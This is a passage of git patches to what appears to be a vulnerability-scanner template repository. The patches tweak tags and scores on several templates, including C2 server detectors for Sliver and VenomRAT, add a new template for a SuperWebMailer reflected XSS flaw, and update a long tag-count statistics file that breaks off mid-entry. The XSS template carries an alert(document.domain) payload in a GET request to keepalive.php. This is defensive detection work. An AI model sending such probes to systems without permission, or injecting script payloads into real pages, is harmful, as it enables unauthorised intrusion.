b6028aa305..52c1a5d0dd 100644 --- a/network/vulnerabilities/clockwatch-enterprise-rce.yaml +++ b/network/vulnerabilities/clockwatch-enterprise-rce.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-77 metadata: max-request: 1 - tags: clockwatch,rce,network + tags: clockwatch,rce,network,tcp tcp: - inputs: diff --git a/passive/cves/2024/CVE-2024-25723.yaml b/passive/cves/2024/CVE-2024-25723.yaml index de606fe734..8cee4b3d29 100644 --- a/passive/cves/2024/CVE-2024-25723.yaml +++ b/passive/cves/2024/CVE-2024-25723.yaml @@ -18,7 +18,7 @@ info: - https://github.com/zenml-io/zenml/compare/0.44.3...0.44.4 classification: epss-score: 0.00045 - epss-percentile: 0.13559 + epss-percentile: 0.15096 metadata: verified: true max-request: 1 diff --git a/ssl/c2/sliver-c2.yaml b/ssl/c2/sliver-c2.yaml index a08fdb62c0..0dd5918ac1 100644 --- a/ssl/c2/sliver-c2.yaml +++ b/ssl/c2/sliver-c2.yaml @@ -12,7 +12,7 @@ info: verified: "true" max-request: 1 shodan-query: product:"Sliver C2" - tags: c2,ssl,ir,osint,malware,sliver + tags: c2,ssl,ir,osint,malware,sliver,tls ssl: - address: "{{Host}}:{{Port}}" matchers-condition: and diff --git a/ssl/c2/venomrat.yaml b/ssl/c2/venomrat.yaml index 49c343dc7a..abee5b20d7 100644 --- a/ssl/c2/venomrat.yaml +++ b/ssl/c2/venomrat.yaml @@ -10,7 +10,7 @@ info: verified: "true" max-request: 1 fofa-query: cert.issuer.cn="VenomRAT Server" - tags: c2,ir,osint,malware,ssl,venomrat + tags: c2,ir,osint,malware,ssl,venomrat,tls ssl: - address: "{{Host}}:{{Port}}" diff --git a/ssl/deprecated-tls.yaml b/ssl/deprecated-tls.yaml index f4eb823cf7..debbb2e17e 100644 --- a/ssl/deprecated-tls.yaml +++ b/ssl/deprecated-tls.yaml @@ -4,17 +4,16 @@ info: name: Deprecated TLS Detection author: righettod,forgedhallpass severity: info - reference: - - https://ssl-config.mozilla.org/#config=intermediate description: | Both TLS 1.1 and SSLv3 are deprecated in favor of stronger encryption. remediation: | Update the web server's TLS configuration to disable TLS 1.1 and SSLv3. + reference: + - https://ssl-config.mozilla.org/#config=intermediate metadata: max-request: 3 shodan-query: ssl.version:sslv2 ssl.version:sslv3 ssl.version:tlsv1 ssl.version:tlsv1.1 tags: ssl,tls - ssl: - address: "{{Host}}:{{Port}}" min_version: tls11 From 768d3d5d1608c290f312d9e6a9001dbb374727d2 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 7 Jun 2024 15:49:17 +0530 Subject: [PATCH 731/847] Create CVE-2023-38194.yaml --- http/cves/2023/CVE-2023-38194.yaml | 45 ++++++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 http/cves/2023/CVE-2023-38194.yaml diff --git a/http/cves/2023/CVE-2023-38194.yaml b/http/cves/2023/CVE-2023-38194.yaml new file mode 100644 index 0000000000..1641b0cac6 --- /dev/null +++ b/http/cves/2023/CVE-2023-38194.yaml @@ -0,0 +1,45 @@ +id: CVE-2023-38194 + +info: + name: SuperWebMailer - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + An issue was discovered in SuperWebMailer 9.00.0.01710 that allows keepalive.php XSS via a GET parameter. + impact: | + Successful exploitation could allow an attacker to execute malicious scripts in the context of a user's browser, leading to potential data theft or account compromise. + remediation: | + Implement input validation and output encoding to prevent XSS attacks in the SuperWebMailer keepalive.php script. + reference: + - https://herolab.usd.de/security-advisories/usd-2023-0013/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-38194 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-38194 + cwe-id: CWE-79 + epss-score: 0.00046 + epss-percentile: 0.15636 + cpe: cpe:2.3:a:superwebmailer:superwebmailer:9.00.0.01710:*:*:*:*:*:*:* + metadata: + max-request: 1 + verified: true + vendor: superwebmailer + product: superwebmailer + shodan-query: title:"SuperWebMailer" + tags: cve,cve2023,superwebmailer,xss + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/keepalive.php?caller=%22%3E%3Cimg+src%3d1+onerror%3dalert(document.domain)+%2F%3E&uq_mt=1664137650.085" + + matchers: + - type: dsl + dsl: + - 'contains(body_2, "<img src=1 onerror=alert(document.domain) />")' + - 'contains(tolower(body_1), "superwebmailer")' + - 'contains(header_2, "text/html")' + - 'status_code_2 == 200' + condition: and From c7773cacfa2752567acc542e86a744fa5eeaa84f Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 7 Jun 2024 10:40:58 +0000 Subject: [PATCH 732/847] Auto Generated Templates Stats [Fri Jun 7 10:40:58 UTC 2024] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 10917 +++++++++++++++++++++-------------------- TOP-10.md | 20 +- 3 files changed, 5518 insertions(+), 5421 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index b1b1c7734c..09fcbab624 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":2490},{"name":"panel","count":1145},{"name":"wordpress","count":976},{"name":"exposure","count":916},{"name":"xss","count":906},{"name":"wp-plugin","count":847},{"name":"osint","count":804},{"name":"tech","count":682},{"name":"lfi","count":658},{"name":"misconfig","count":620},{"name":"edb","count":599},{"name":"rce","count":594},{"name":"packetstorm","count":530},{"name":"wpscan","count":497},{"name":"cve2021","count":491},{"name":"cve2022","count":476},{"name":"wp","count":421},{"name":"cve2023","count":374},{"name":"unauth","count":366},{"name":"sqli","count":357},{"name":"file","count":346},{"name":"authenticated","count":341},{"name":"intrusive","count":300},{"name":"detect","count":283},{"name":"login","count":276},{"name":"kev","count":268},{"name":"cve2020","count":257},{"name":"token-spray","count":243},{"name":"oast","count":222},{"name":"config","count":221},{"name":"top-200","count":215},{"name":"default-login","count":212},{"name":"osint-social","count":210},{"name":"token","count":193},{"name":"network","count":192},{"name":"","count":192},{"name":"apache","count":189},{"name":"devops","count":176},{"name":"cve2018","count":169},{"name":"iot","count":166},{"name":"cve2019","count":165},{"name":"keys","count":155},{"name":"joomla","count":148},{"name":"malware","count":142},{"name":"redirect","count":135},{"name":"aws","count":133},{"name":"cloud","count":132},{"name":"auth-bypass","count":131},{"name":"ssrf","count":119},{"name":"install","count":118},{"name":"phishing","count":117},{"name":"amazon","count":116},{"name":"files","count":113},{"name":"cms","count":112},{"name":"cve2010","count":112},{"name":"cve2017","count":110},{"name":"router","count":108},{"name":"top-100","count":100},{"name":"disclosure","count":89},{"name":"aws-cloud-config","count":89},{"name":"linux","count":83},{"name":"code","count":81},{"name":"local","count":80},{"name":"takeover","count":79},{"name":"seclists","count":79},{"name":"privesc","count":79},{"name":"tokens","count":78},{"name":"fileupload","count":76},{"name":"oracle","count":71},{"name":"cve2024","count":69},{"name":"oss","count":67},{"name":"cisco","count":66},{"name":"js","count":63},{"name":"adobe","count":62},{"name":"ir","count":61},{"name":"cve2015","count":59},{"name":"huntr","count":59},{"name":"atlassian","count":57},{"name":"cve2016","count":57},{"name":"google","count":56},{"name":"enum","count":56},{"name":"vmware","count":56},{"name":"c2","count":55},{"name":"tenable","count":48},{"name":"logs","count":48},{"name":"log4j","count":47},{"name":"vulhub","count":46},{"name":"hackerone","count":46},{"name":"aem","count":45},{"name":"osint-gaming","count":45},{"name":"jndi","count":44},{"name":"debug","count":44},{"name":"php","count":44},{"name":"cve2014","count":44},{"name":"deserialization","count":43},{"name":"traversal","count":42},{"name":"osint-hobby","count":42},{"name":"generic","count":42},{"name":"plugin","count":42},{"name":"osint-porn","count":42},{"name":"oa","count":42},{"name":"springboot","count":41},{"name":"cnvd","count":40},{"name":"misc","count":39},{"name":"microsoft","count":38},{"name":"injection","count":38},{"name":"kubernetes","count":37},{"name":"listing","count":37},{"name":"jira","count":37},{"name":"cti","count":36},{"name":"ibm","count":36},{"name":"osint-misc","count":35},{"name":"sap","count":34},{"name":"ssl","count":33},{"name":"fuzz","count":33},{"name":"miscellaneous","count":32},{"name":"osint-tech","count":31},{"name":"osint-coding","count":30},{"name":"dlink","count":30},{"name":"tls","count":30},{"name":"wp-theme","count":30},{"name":"ec2","count":30},{"name":"k8s","count":28},{"name":"gitlab","count":28},{"name":"fortinet","count":28},{"name":"api","count":28},{"name":"citrix","count":27},{"name":"bestwebsoft","count":27},{"name":"proxy","count":27},{"name":"firewall","count":26},{"name":"lfr","count":26},{"name":"cve2012","count":26},{"name":"weaver","count":25},{"name":"ssh","count":25},{"name":"manageengine","count":25},{"name":"zohocorp","count":25},{"name":"osint-business","count":24},{"name":"dns","count":24},{"name":"osint-images","count":24},{"name":"osint-shopping","count":24},{"name":"osint-finance","count":24},{"name":"zoho","count":24},{"name":"stored-xss","count":23},{"name":"audit","count":23},{"name":"admin","count":23},{"name":"yonyou","count":23},{"name":"tomcat","count":23},{"name":"xxe","count":23},{"name":"file-upload","count":23},{"name":"github","count":22},{"name":"s3","count":22},{"name":"prestashop","count":22},{"name":"cicd","count":22},{"name":"printer","count":21},{"name":"msf","count":21},{"name":"weblogic","count":21},{"name":"ecology","count":21},{"name":"dast","count":21},{"name":"jenkins","count":20},{"name":"camera","count":20},{"name":"struts","count":19},{"name":"hp","count":19},{"name":"grafana","count":19},{"name":"wavlink","count":19},{"name":"rukovoditel","count":19},{"name":"ftp","count":19},{"name":"osint-music","count":18},{"name":"coldfusion","count":18},{"name":"cve2011","count":18},{"name":"android","count":18},{"name":"ruijie","count":18},{"name":"vpn","count":17},{"name":"node.js","count":17},{"name":"service","count":17},{"name":"confluence","count":17},{"name":"azure","count":17},{"name":"honeypot","count":17},{"name":"mail","count":17},{"name":"nginx","count":17},{"name":"microweber","count":16},{"name":"backup","count":16},{"name":"rconfig","count":16},{"name":"cve2009","count":16},{"name":"jarm","count":16},{"name":"osint-blog","count":16},{"name":"alibaba","count":16},{"name":"status","count":16},{"name":"magento","count":16},{"name":"dashboard","count":15},{"name":"nodejs","count":15},{"name":"cve2008","count":15},{"name":"ruby","count":15},{"name":"woocommerce","count":15},{"name":"zyxel","count":15},{"name":"setup","count":15},{"name":"bypass","count":15},{"name":"tongda","count":15},{"name":"ssti","count":15},{"name":"installer","count":15},{"name":"java","count":15},{"name":"seeyon","count":15},{"name":"backdoor","count":15},{"name":"moosocial","count":15},{"name":"cnvd2021","count":15},{"name":"cve2013","count":15},{"name":"auth","count":14},{"name":"redhat","count":14},{"name":"docker","count":14},{"name":"domainmod","count":14},{"name":"osint-health","count":14},{"name":"smb","count":14},{"name":"node","count":14},{"name":"dell","count":14},{"name":"npm","count":14},{"name":"git","count":14},{"name":"headless","count":14},{"name":"windows","count":14},{"name":"jboss","count":14},{"name":"nagios","count":14},{"name":"icewarp","count":14},{"name":"redis","count":14},{"name":"creds-stuffing","count":14},{"name":"rds","count":14},{"name":"smtp","count":14},{"name":"login-check","count":14},{"name":"osint-art","count":14},{"name":"netgear","count":13},{"name":"hashicorp","count":13},{"name":"airflow","count":13},{"name":"rails","count":13},{"name":"graphql","count":13},{"name":"ivanti","count":13},{"name":"cuppa","count":13},{"name":"abstractapi","count":13},{"name":"osint-political","count":13},{"name":"cuppacms","count":13},{"name":"sonicwall","count":13},{"name":"osint-dating","count":13},{"name":"laravel","count":13},{"name":"mysql","count":13},{"name":"fortigate","count":13},{"name":"postgresql","count":13},{"name":"webserver","count":12},{"name":"vbulletin","count":12},{"name":"zimbra","count":12},{"name":"doppler","count":12},{"name":"newrelic","count":12},{"name":"netsweeper","count":12},{"name":"kafka","count":12},{"name":"info-leak","count":12},{"name":"ofbiz","count":12},{"name":"drupal","count":12},{"name":"cache","count":11},{"name":"django","count":11},{"name":"spring","count":11},{"name":"osint-video","count":11},{"name":"online-fire-reporting","count":11},{"name":"online_fire_reporting_system_project","count":11},{"name":"prometheus","count":11},{"name":"hikvision","count":11},{"name":"iam","count":11},{"name":"xstream","count":11},{"name":"fastjson","count":11},{"name":"phpmyadmin","count":11},{"name":"jetbrains","count":11},{"name":"phpgurukul","count":11},{"name":"jolokia","count":11},{"name":"iis","count":11},{"name":"glpi","count":10},{"name":"thinkphp","count":10},{"name":"elasticsearch","count":10},{"name":"samsung","count":10},{"name":"solarview","count":10},{"name":"dahua","count":10},{"name":"db","count":10},{"name":"dropbox","count":10},{"name":"sitecore","count":10},{"name":"solr","count":10},{"name":"digitalocean","count":10},{"name":"dedecms","count":10},{"name":"xstream_project","count":10},{"name":"symfony","count":10},{"name":"zabbix","count":10},{"name":"moodle","count":9},{"name":"vcenter","count":9},{"name":"facebook","count":9},{"name":"cnvd2020","count":9},{"name":"exchange","count":9},{"name":"sangfor","count":9},{"name":"lucee","count":9},{"name":"progress","count":9},{"name":"secret","count":9},{"name":"blind","count":9},{"name":"cloudtrail","count":9},{"name":"wso2","count":9},{"name":"elastic","count":9},{"name":"python","count":9},{"name":"sophos","count":9},{"name":"crlf","count":9},{"name":"pfsense","count":9},{"name":"gitea","count":9},{"name":"druid","count":9},{"name":"artica","count":9},{"name":"scada","count":9},{"name":"bitbucket","count":9},{"name":"opencats","count":9},{"name":"versa","count":9},{"name":"firebase","count":9},{"name":"kube","count":9},{"name":"ognl","count":8},{"name":"mlflow","count":8},{"name":"bucket","count":8},{"name":"discord","count":8},{"name":"error","count":8},{"name":"mirai","count":8},{"name":"recon","count":8},{"name":"gateway","count":8},{"name":"console","count":8},{"name":"cisco-switch","count":8},{"name":"microfocus","count":8},{"name":"phpinfo","count":8},{"name":"spotweb_project","count":8},{"name":"osint-news","count":8},{"name":"metadata","count":8},{"name":"hms","count":8},{"name":"config-audit","count":8},{"name":"emerge","count":8},{"name":"phpjabbers","count":8},{"name":"default-page","count":8},{"name":"symantec","count":8},{"name":"atom","count":8},{"name":"unauthenticated","count":8},{"name":"odoo","count":8},{"name":"huawei","count":8},{"name":"oauth","count":8},{"name":"wanhu","count":8},{"name":"nexus","count":8},{"name":"e-office","count":8},{"name":"manager","count":8},{"name":"cloud-enum","count":8},{"name":"go","count":8},{"name":"spotweb","count":8},{"name":"twitter","count":7},{"name":"keking","count":7},{"name":"nortekcontrol","count":7},{"name":"linkedin","count":7},{"name":"gogs","count":7},{"name":"fpd","count":7},{"name":"squirrelmail","count":7},{"name":"telesquare","count":7},{"name":"bloofox","count":7},{"name":"exploitdb","count":7},{"name":"f5","count":7},{"name":"filemanager","count":7},{"name":"instrusive","count":7},{"name":"database","count":7},{"name":"mongodb","count":7},{"name":"oos","count":7},{"name":"car_rental_management_system_project","count":7},{"name":"nagiosxi","count":7},{"name":"websphere","count":7},{"name":"avtech","count":7},{"name":"mobileiron","count":7},{"name":"vms","count":7},{"name":"monstra","count":7},{"name":"rfi","count":7},{"name":"nacos","count":7},{"name":"fortios","count":7},{"name":"ruckus","count":7},{"name":"shopify","count":7},{"name":"blockchain","count":7},{"name":"contec","count":7},{"name":"maps","count":7},{"name":"cacti","count":7},{"name":"joomla\\!","count":7},{"name":"bigip","count":7},{"name":"opensis","count":7},{"name":"activemq","count":7},{"name":"openemr","count":7},{"name":"pmb","count":7},{"name":"landray","count":7},{"name":"solarwinds","count":7},{"name":"moodating","count":7},{"name":"vpc","count":7},{"name":"teamcity","count":7},{"name":"slack","count":7},{"name":"gcp","count":6},{"name":"typo3","count":6},{"name":"splunk","count":6},{"name":"ldap","count":6},{"name":"servicenow","count":6},{"name":"magmi","count":6},{"name":"keycloak","count":6},{"name":"sql","count":6},{"name":"doctor-appointment-system","count":6},{"name":"plesk","count":6},{"name":"elfinder","count":6},{"name":"tikiwiki","count":6},{"name":"jeecg","count":6},{"name":"asp","count":6},{"name":"lfprojects","count":6},{"name":"paypal","count":6},{"name":"liferay","count":6},{"name":"synacor","count":6},{"name":"jamf","count":6},{"name":"zhiyuan","count":6},{"name":"vrealize","count":6},{"name":"express","count":6},{"name":"microstrategy","count":6},{"name":"doctor_appointment_system_project","count":6},{"name":"cobbler","count":6},{"name":"advantech","count":6},{"name":"webmin","count":6},{"name":"beyondtrust","count":6},{"name":"flutterwave","count":6},{"name":"server","count":6},{"name":"jetty","count":6},{"name":"chanjet","count":6},{"name":"minio","count":6},{"name":"geoserver","count":6},{"name":"log","count":6},{"name":"rat","count":6},{"name":"asus","count":6},{"name":"cockpit","count":6},{"name":"74cms","count":6},{"name":"kubelet","count":6},{"name":"couchdb","count":6},{"name":"leak","count":6},{"name":"sonarqube","count":6},{"name":"bmc","count":6},{"name":"openvpn","count":6},{"name":"sentry","count":5},{"name":"tenda","count":5},{"name":"apisix","count":5},{"name":"ethereum","count":5},{"name":"adb","count":5},{"name":"10web","count":5},{"name":"cve2007","count":5},{"name":"acm","count":5},{"name":"froxlor","count":5},{"name":"thedigitalcraft","count":5},{"name":"web3","count":5},{"name":"matrix","count":5},{"name":"terramaster","count":5},{"name":"metinfo","count":5},{"name":"craftcms","count":5},{"name":"awstats","count":5},{"name":"react","count":5},{"name":"chamilo","count":5},{"name":"agentejo","count":5},{"name":"avideo","count":5},{"name":"goanywhere","count":5},{"name":"zzzcms","count":5},{"name":"akamai","count":5},{"name":"hpe","count":5},{"name":"voip","count":5},{"name":"elementor","count":5},{"name":"axigen","count":5},{"name":"square","count":5},{"name":"gocd","count":5},{"name":"glpi-project","count":5},{"name":"avaya","count":5},{"name":"adminer","count":5},{"name":"jabber","count":5},{"name":"strapi","count":5},{"name":"wbce","count":5},{"name":"storage","count":5},{"name":"jupyter","count":5},{"name":"sysaid","count":5},{"name":"cdata","count":5},{"name":"xmlrpc","count":5},{"name":"paloaltonetworks","count":5},{"name":"qdpm","count":5},{"name":"vehicle_service_management_system_project","count":5},{"name":"openfire","count":5},{"name":"nuuo","count":5},{"name":"qnap","count":5},{"name":"carrental","count":5},{"name":"pyload","count":5},{"name":"jwt","count":5},{"name":"hoteldruid","count":5},{"name":"percha","count":5},{"name":"webview","count":5},{"name":"openai","count":5},{"name":"graylog","count":5},{"name":"circontrol","count":5},{"name":"connectwise","count":5},{"name":"parallels","count":5},{"name":"cloudflare","count":5},{"name":"genetechsolutions","count":5},{"name":"caucho","count":5},{"name":"open-emr","count":5},{"name":"totolink","count":5},{"name":"schneider-electric","count":5},{"name":"magmi_project","count":5},{"name":"fatpipe","count":5},{"name":"ems","count":5},{"name":"dionaea","count":5},{"name":"resin","count":5},{"name":"asana","count":5},{"name":"crushftp","count":5},{"name":"cnvd2023","count":5},{"name":"swagger","count":5},{"name":"hybris","count":5},{"name":"openstack","count":5},{"name":"redmine","count":5},{"name":"decision-center","count":5},{"name":"papercut","count":5},{"name":"firmware","count":5},{"name":"circarlife","count":5},{"name":"rseenet","count":5},{"name":"mssql","count":5},{"name":"kkfileview","count":5},{"name":"tibco","count":5},{"name":"sftp","count":5},{"name":"mikrotik","count":5},{"name":"easypost","count":4},{"name":"intelbras","count":4},{"name":"webkul","count":4},{"name":"stripe","count":4},{"name":"reprisesoftware","count":4},{"name":"harbor","count":4},{"name":"puppet","count":4},{"name":"pixie","count":4},{"name":"dom","count":4},{"name":"dolibarr","count":4},{"name":"kingsoft","count":4},{"name":"figma","count":4},{"name":"artifactory","count":4},{"name":"opencms","count":4},{"name":"env","count":4},{"name":"phppgadmin","count":4},{"name":"terra-master","count":4},{"name":"jellyfin","count":4},{"name":"webshell","count":4},{"name":"spark","count":4},{"name":"pentaho","count":4},{"name":"pmb_project","count":4},{"name":"casaos","count":4},{"name":"jsf","count":4},{"name":"wcs","count":4},{"name":"ghost","count":4},{"name":"grav","count":4},{"name":"aria","count":4},{"name":"okta","count":4},{"name":"dahuasecurity","count":4},{"name":"rabbitmq","count":4},{"name":"concrete","count":4},{"name":"metasploit","count":4},{"name":"mcafee","count":4},{"name":"codeigniter","count":4},{"name":"veronalabs","count":4},{"name":"osint-archived","count":4},{"name":"owncloud","count":4},{"name":"igniterealtime","count":4},{"name":"ray","count":4},{"name":"royalevent","count":4},{"name":"flink","count":4},{"name":"thinkcmf","count":4},{"name":"consul","count":4},{"name":"confluent","count":4},{"name":"mostra","count":4},{"name":"info","count":4},{"name":"cve2005","count":4},{"name":"prtg","count":4},{"name":"globalprotect","count":4},{"name":"photo","count":4},{"name":"kentico","count":4},{"name":"search","count":4},{"name":"checkpoint","count":4},{"name":"audiocodes","count":4},{"name":"djangoproject","count":4},{"name":"salesforce","count":4},{"name":"learnpress","count":4},{"name":"hospital_management_system_project","count":4},{"name":"harmistechnology","count":4},{"name":"metabase","count":4},{"name":"roxy","count":4},{"name":"flickr","count":4},{"name":"postmessage","count":4},{"name":"mautic","count":4},{"name":"eclipse","count":4},{"name":"angular","count":4},{"name":"creativeitem","count":4},{"name":"rubyonrails","count":4},{"name":"digitaldruid","count":4},{"name":"telegram","count":4},{"name":"mitel","count":4},{"name":"panos","count":4},{"name":"ebs","count":4},{"name":"bamboo","count":4},{"name":"aura","count":4},{"name":"cnvd2019","count":4},{"name":"pie-register","count":4},{"name":"d-link","count":4},{"name":"metersphere","count":4},{"name":"juniper","count":4},{"name":"moveit","count":4},{"name":"ternaria","count":4},{"name":"mostracms","count":4},{"name":"age-encryption","count":4},{"name":"linkerd","count":4},{"name":"pega","count":4},{"name":"joomlamo","count":4},{"name":"auieo","count":4},{"name":"fit2cloud","count":4},{"name":"jorani","count":4},{"name":"seagate","count":4},{"name":"aspose","count":4},{"name":"dotnet","count":4},{"name":"gnuboard","count":4},{"name":"nosqli","count":4},{"name":"sendgrid","count":4},{"name":"tiki","count":4},{"name":"kyocera","count":4},{"name":"h3c","count":4},{"name":"centos","count":4},{"name":"kevinlab","count":4},{"name":"shiro","count":4},{"name":"sugarcrm","count":4},{"name":"sound4","count":4},{"name":"jfrog","count":4},{"name":"churchcrm","count":4},{"name":"kibana","count":4},{"name":"cnvd2022","count":4},{"name":"httpd","count":4},{"name":"hongdian","count":4},{"name":"candidats","count":4},{"name":"wireguard","count":4},{"name":"rocketchat","count":4},{"name":"hongfan","count":4},{"name":"osgeo","count":4},{"name":"imgproxy","count":4},{"name":"heroku","count":4},{"name":"arcgis","count":4},{"name":"ampache","count":4},{"name":"purchase_order_management_system_project","count":4},{"name":"httpserver","count":4},{"name":"finicity","count":4},{"name":"newstatpress","count":4},{"name":"articatech","count":4},{"name":"umbraco","count":4},{"name":"springcloud","count":4},{"name":"os4ed","count":4},{"name":"mailchimp","count":4},{"name":"linksys","count":4},{"name":"mantisbt","count":4},{"name":"http","count":4},{"name":"horde","count":4},{"name":"bittrex","count":4},{"name":"linuxfoundation","count":4},{"name":"powerjob","count":4},{"name":"wpdevart","count":4},{"name":"pip","count":4},{"name":"nextjs","count":4},{"name":"bitrix","count":4},{"name":"newstatpress_project","count":4},{"name":"datadog","count":4},{"name":"password","count":4},{"name":"zend","count":4},{"name":"panabit","count":4},{"name":"telerik","count":4},{"name":"webmail","count":4},{"name":"flatpress","count":4},{"name":"pluginus","count":4},{"name":"zte","count":4},{"name":"wp-statistics","count":4},{"name":"yeswiki","count":4},{"name":"phpjabber","count":4},{"name":"switch","count":3},{"name":"lansweeper","count":3},{"name":"itop","count":3},{"name":"apple","count":3},{"name":"thefactory","count":3},{"name":"truenas","count":3},{"name":"bash","count":3},{"name":"sharepoint","count":3},{"name":"key","count":3},{"name":"grp","count":3},{"name":"modoboa","count":3},{"name":"poms","count":3},{"name":"zeit","count":3},{"name":"teampass","count":3},{"name":"rancher","count":3},{"name":"sudo","count":3},{"name":"eshop","count":3},{"name":"vercel","count":3},{"name":"graph","count":3},{"name":"gibbon","count":3},{"name":"jeesns","count":3},{"name":"dotcms","count":3},{"name":"3cx","count":3},{"name":"instagram","count":3},{"name":"forgerock","count":3},{"name":"soplanning","count":3},{"name":"samba","count":3},{"name":"dokuwiki","count":3},{"name":"credential","count":3},{"name":"etcd","count":3},{"name":"evlink","count":3},{"name":"geowebserver","count":3},{"name":"clusterengine","count":3},{"name":"openbmcs","count":3},{"name":"ad","count":3},{"name":"flutter","count":3},{"name":"voipmonitor","count":3},{"name":"structurizr","count":3},{"name":"i3geo","count":3},{"name":"yii","count":3},{"name":"revive-adserver","count":3},{"name":"webtareas","count":3},{"name":"movable","count":3},{"name":"draytek","count":3},{"name":"posh","count":3},{"name":"discourse","count":3},{"name":"webadmin","count":3},{"name":"imap","count":3},{"name":"superadmin","count":3},{"name":"pulsar","count":3},{"name":"magnolia","count":3},{"name":"epson","count":3},{"name":"self-hosted","count":3},{"name":"e-cology","count":3},{"name":"adiscon","count":3},{"name":"fastly","count":3},{"name":"diagrams","count":3},{"name":"circleci","count":3},{"name":"octobercms","count":3},{"name":"thinfinity","count":3},{"name":"webalizer","count":3},{"name":"inspur","count":3},{"name":"trixbox","count":3},{"name":"pandorafms","count":3},{"name":"limesurvey","count":3},{"name":"cas","count":3},{"name":"myeventon","count":3},{"name":"empirecms","count":3},{"name":"droneci","count":3},{"name":"bitrix24","count":3},{"name":"complete_online_job_search_system_project","count":3},{"name":"rlm","count":3},{"name":"httpbin","count":3},{"name":"dubbo","count":3},{"name":"ninjaforms","count":3},{"name":"ampps","count":3},{"name":"watchguard","count":3},{"name":"messaging","count":3},{"name":"webcam","count":3},{"name":"avada","count":3},{"name":"gvectors","count":3},{"name":"hsphere","count":3},{"name":"fileman","count":3},{"name":"ruckuswireless","count":3},{"name":"tableau","count":3},{"name":"netdata","count":3},{"name":"nuget","count":3},{"name":"chatgpt","count":3},{"name":"steve","count":3},{"name":"saltstack","count":3},{"name":"intercom","count":3},{"name":"weiphp","count":3},{"name":"aptus","count":3},{"name":"ansible","count":3},{"name":"nuxtjs","count":3},{"name":"school_dormitory_management_system_project","count":3},{"name":"h2o","count":3},{"name":"yzmcms","count":3},{"name":"sony","count":3},{"name":"payara","count":3},{"name":"getsimple","count":3},{"name":"redash","count":3},{"name":"selea","count":3},{"name":"copyparty","count":3},{"name":"academylms","count":3},{"name":"targa","count":3},{"name":"contentful","count":3},{"name":"proftpd","count":3},{"name":"netflix","count":3},{"name":"strangerstudios","count":3},{"name":"mapbox","count":3},{"name":"tautulli","count":3},{"name":"apollo","count":3},{"name":"sidekiq","count":3},{"name":"qlik","count":3},{"name":"newsletter","count":3},{"name":"kavita","count":3},{"name":"forum","count":3},{"name":"smuggling","count":3},{"name":"mooveagency","count":3},{"name":"rackn","count":3},{"name":"opencart","count":3},{"name":"cluster","count":3},{"name":"temenos","count":3},{"name":"gnu","count":3},{"name":"rpm","count":3},{"name":"reddit","count":3},{"name":"xoops","count":3},{"name":"sqlite","count":3},{"name":"qts","count":3},{"name":"jitsi","count":3},{"name":"adafruit","count":3},{"name":"backdropcms","count":3},{"name":"lighttpd","count":3},{"name":"western_digital","count":3},{"name":"petya","count":3},{"name":"xerox","count":3},{"name":"sitemap","count":3},{"name":"lotus","count":3},{"name":"joomlacomponent.inetlanka","count":3},{"name":"securepoint","count":3},{"name":"sharefile","count":3},{"name":"default","count":3},{"name":"modem","count":3},{"name":"fanruan","count":3},{"name":"emqx","count":3},{"name":"dev.pucit.edu.pk","count":3},{"name":"eyoucms","count":3},{"name":"automattic","count":3},{"name":"softwarepublico","count":3},{"name":"gradle","count":3},{"name":"thruk","count":3},{"name":"tplus","count":3},{"name":"idrac","count":3},{"name":"shell","count":3},{"name":"airtable","count":3},{"name":"esafenet","count":3},{"name":"e-mobile","count":3},{"name":"electron","count":3},{"name":"loytec","count":3},{"name":"xxljob","count":3},{"name":"digitalrebar","count":3},{"name":"pypi","count":3},{"name":"dzzoffice","count":3},{"name":"purchase-order-management-system","count":3},{"name":"spip","count":3},{"name":"axis2","count":3},{"name":"cpanel","count":3},{"name":"dos","count":3},{"name":"osticket","count":3},{"name":"netfortris","count":3},{"name":"clientid","count":3},{"name":"particle","count":3},{"name":"cloudwatch","count":3},{"name":"glassfish","count":3},{"name":"woodwing","count":3},{"name":"wordfence","count":3},{"name":"nifi","count":3},{"name":"casdoor","count":3},{"name":"finecms","count":3},{"name":"decision-server","count":3},{"name":"afterlogic","count":3},{"name":"r-seenet","count":3},{"name":"rstudio","count":3},{"name":"buffalo","count":3},{"name":"purchase-order","count":3},{"name":"mythic","count":3},{"name":"zeroshell","count":3},{"name":"openwrt","count":3},{"name":"zerof","count":3},{"name":"waf","count":3},{"name":"octoprint","count":3},{"name":"favicon","count":3},{"name":"flexvnf","count":3},{"name":"dotnetnuke","count":3},{"name":"trendnet","count":3},{"name":"carel","count":3},{"name":"netlify","count":3},{"name":"fuelcms","count":3},{"name":"piwigo","count":3},{"name":"superset","count":3},{"name":"boldgrid","count":3},{"name":"dvr","count":3},{"name":"postman","count":3},{"name":"bigant","count":3},{"name":"actuator","count":3},{"name":"mpsec","count":3},{"name":"selenium","count":3},{"name":"axway","count":3},{"name":"std42","count":3},{"name":"mailgun","count":3},{"name":"influxdb","count":3},{"name":"monitor","count":3},{"name":"ueditor","count":3},{"name":"synology","count":3},{"name":"ixcache","count":3},{"name":"zendesk","count":3},{"name":"siemens","count":3},{"name":"listserv","count":3},{"name":"unifi","count":3},{"name":"segment","count":3},{"name":"webkul-qloapps","count":3},{"name":"kfm","count":3},{"name":"backdrop","count":3},{"name":"cybelesoft","count":3},{"name":"learndash","count":3},{"name":"drawio","count":3},{"name":"webtareas_project","count":3},{"name":"nortek","count":3},{"name":"openam","count":3},{"name":"covenant","count":3},{"name":"wwbn","count":3},{"name":"axis","count":3},{"name":"spotify","count":3},{"name":"csrf","count":3},{"name":"revive","count":3},{"name":"ithemes","count":3},{"name":"contribsys","count":3},{"name":"labkey","count":3},{"name":"mongo","count":3},{"name":"processwire","count":3},{"name":"fanwei","count":3},{"name":"r